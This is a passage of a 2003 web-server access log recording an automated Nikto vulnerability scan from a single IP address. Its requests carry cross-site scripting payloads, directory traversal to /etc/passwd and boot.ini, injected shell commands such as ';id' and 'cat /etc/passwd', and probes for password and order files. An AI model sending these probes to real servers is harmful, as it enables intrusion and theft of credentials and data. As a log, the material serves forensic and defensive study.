HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:32 +0900] "GET /mkstats/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:33 +0900] "GET /mlog.phtml HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:33 +0900] "GET /modsecurity.php HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:34 +0900] "GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:38 +0900] "GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:39 +0900] "GET /modules.php?name=Downloads&d_op=viewdownload HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:39 +0900] "GET /modules.php?name=Downloads&d_op=viewdownload HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:40 +0900] "GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:41 +0900] "GET /modules.php?name=Members_List&letter=All&sortby=pass HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:41 +0900] "GET /modules.php?name=Members_List&sql_debug=1 HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:42 +0900] "GET /modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:43 +0900] "GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:44 +0900] "GET /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:44 +0900] "GET /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:45 +0900] "GET /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:46 +0900] "GET /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:46 +0900] "GET /modules.php?op=modload&name=0&file=0 HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:47 +0900] "GET /modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script| HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:48 +0900] "GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:49 +0900] "GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0 HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:49 +0900] "GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:50 +0900] "GET /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:51 +0900] "GET /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:51 +0900] "GET /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:52 +0900] "GET /modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>; HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:53 +0900] "GET /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:54 +0900] "GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:54 +0900] "GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:55 +0900] "GET /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:56 +0900] "GET /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:56 +0900] "GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:57 +0900] "GET /modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:58 +0900] "GET /modules/Forums/bb_smilies.php?bgcolor1=\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:59 +0900] "GET /modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script> HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:39:59 +0900] "GET /modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script> HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:00 +0900] "GET /modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script> HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:01 +0900] "GET /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script> HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:01 +0900] "GET /mod_ose_docs HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:02 +0900] "GET /mp3/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:03 +0900] "GET /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb HTTP/1.0" 404 326 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:04 +0900] "GET /msadm/domain/index.php3?account_name=\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:04 +0900] "GET /msadm/site/index.php3?authid=\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:05 +0900] "GET /msadm/user/login.php3?account_name=\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:06 +0900] "GET /msql/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:06 +0900] "GET /myhome.php?action=messages&box=<script>alert('Vulnerable')</script> HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:07 +0900] "GET /mylog.phtml?screen=/etc/passwd HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:08 +0900] "GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:09 +0900] "GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:09 +0900] "GET /nav/cList.php?root=</script><script>alert('Vulnerable')/<script> HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:10 +0900] "GET /ncl_items.html HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:14 +0900] "GET /ncl_items.shtml?SUBJECT=1 HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:15 +0900] "GET /netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:15 +0900] "GET /netget?sid=user&msg=300&file=../../../../../../../../../boot.ini HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:16 +0900] "GET /netutils/findata.stm?host=<script>alert(document.cookie)</script> HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:17 +0900] "GET /netutils/findata.stm?user=<script>alert(document.cookie)</script> HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:18 +0900] "GET /netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script> HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:18 +0900] "GET /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script> HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:19 +0900] "GET /new/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:20 +0900] "GET /news/news.mdb HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:20 +0900] "GET /newuser?Image=../../database/rbsserv.mdb HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:21 +0900] "GET /nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:22 +0900] "GET /odbc/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:23 +0900] "GET /oekaki/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:23 +0900] "GET /officescan/cgi/jdkRqNotify.exe HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:24 +0900] "GET /officescan/hotdownload/ofscan.ini HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:25 +0900] "GET /ojspdemos/basic/hellouser/hellouser.jsp HTTP/1.0" 404 311 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:25 +0900] "GET /ojspdemos/basic/simple/usebean.jsp HTTP/1.0" 404 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:26 +0900] "GET /ojspdemos/basic/simple/welcomeuser.jsp HTTP/1.0" 404 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:27 +0900] "GET /old/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:28 +0900] "GET /opendir.php?/etc/passwd HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:28 +0900] "GET /opendir.php?requesturl=/etc/passwd HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:29 +0900] "GET /oprocmgr-status HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:30 +0900] "GET /options.php?optpage=<script>alert('Vulnerable!')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:30 +0900] "GET /oracle HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:31 +0900] "GET /order/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:32 +0900] "GET /order/order_log.dat HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:33 +0900] "GET /order/order_log_v12.dat HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:33 +0900] "GET /orders/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:34 +0900] "GET /orders/checks.txt HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:35 +0900] "GET /orders/mountain.cfg HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:35 +0900] "GET /orders/orders.log HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:36 +0900] "GET /orders/orders.txt HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:37 +0900] "GET /Orders/order_log.dat HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:38 +0900] "GET /orders/order_log.dat HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:38 +0900] "GET /Orders/order_log_v12.dat HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:39 +0900] "GET /orders/order_log_v12.dat HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:40 +0900] "GET /outgoing/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:40 +0900] "GET /ows-bin/perlidlc.bat?&dir HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:41 +0900] "GET /page.cgi?../../../../../../../../../../etc/passwd HTTP/1.0" 403 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:42 +0900] "GET /Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:43 +0900] "GET /pages/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:43 +0900] "GET /pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.0" 404 334 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:44 +0900] "GET /passwd HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:45 +0900] "GET /passwd.adjunct HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:46 +0900] "GET /passwd.txt HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:46 +0900] "GET /passwdfile HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:47 +0900] "GET /password HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:48 +0900] "GET /password.inc HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:48 +0900] "GET /password/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:49 +0900] "GET /passwords.txt HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:50 +0900] "GET /passwords/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:51 +0900] "GET /pccsmysqladm/incs/dbconnect.inc HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:51 +0900] "GET /PDG_Cart/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:52 +0900] "GET /PDG_Cart/oder.log HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:56 +0900] "GET /PDG_Cart/shopper.conf HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:57 +0900] "GET /people.lst HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:57 +0900] "GET /perl/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:58 +0900] "GET /perl/-e%20%22system('cat%20/etc/passwd');\\%22 HTTP/1.0" 404 309 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:40:59 +0900] "GET /perl5/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:00 +0900] "GET /pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:00 +0900] "GET /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:01 +0900] "GET /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:03 +0900] "GET /phorum/admin/stats.php HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:04 +0900] "GET /photo_album/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:04 +0900] "GET /php.ini HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:05 +0900] "GET /php/ HTTP/1.0" 200 890 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:06 +0900] "GET /php/index.php HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:06 +0900] "GET /php/mlog.phtml HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:07 +0900] "GET /php/mylog.phtml?screen=/etc/passwd HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:08 +0900] "GET /php/php.exe?c:\\winnt\\boot.ini HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:09 +0900] "GET /phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:09 +0900] "GET /phpBB/phpinfo.php HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:10 +0900] "GET /phpBB/viewtopic.php?t=17071&highlight=\\\">\\\"<script>javascript:alert(document.cookie)</script> HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:11 +0900] "GET /phpBB2/includes/db.php HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:12 +0900] "GET /phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script> HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:12 +0900] "GET /phpEventCalendar/file_upload.php HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:13 +0900] "GET /phpimageview.php?pic=javascript:alert('Vulnerable') HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:14 +0900] "GET /phpinfo.php HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:14 +0900] "GET /phpinfo.php3 HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:15 +0900] "GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:16 +0900] "GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:17 +0900] "GET /phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:17 +0900] "GET /phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:18 +0900] "GET /phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\\", HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:19 +0900] "GET /phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:19 +0900] "GET /phprocketaddin/?page=../../../../../../../../../../boot.ini HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:20 +0900] "GET /phprocketaddin/?page=../../../../../../../../../../etc/passwd HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:21 +0900] "GET /phpshare/phpshare.php HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:22 +0900] "GET /phptonuke.php?filnavn=/etc/passwd HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:22 +0900] "GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</script> HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:23 +0900] "GET /phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:24 +0900] "GET /piranha/secure/passwd.php3 HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:24 +0900] "GET /pls/help/<script>alert('Vulnerable')</script> HTTP/1.0" 404 329 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:25 +0900] "GET /pls/portal30/admin_/ HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:26 +0900] "GET /pls/sample/admin_/help/..%255cplsql.conf HTTP/1.0" 404 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:27 +0900] "GET /pls/simpledad/admin_/ HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:27 +0900] "GET /pls/simpledad/admin_/gateway.htm?schema=sample HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:28 +0900] "GET /pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:29 +0900] "GET /pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:29 +0900] "GET /porn/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:30 +0900] "GET /postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> 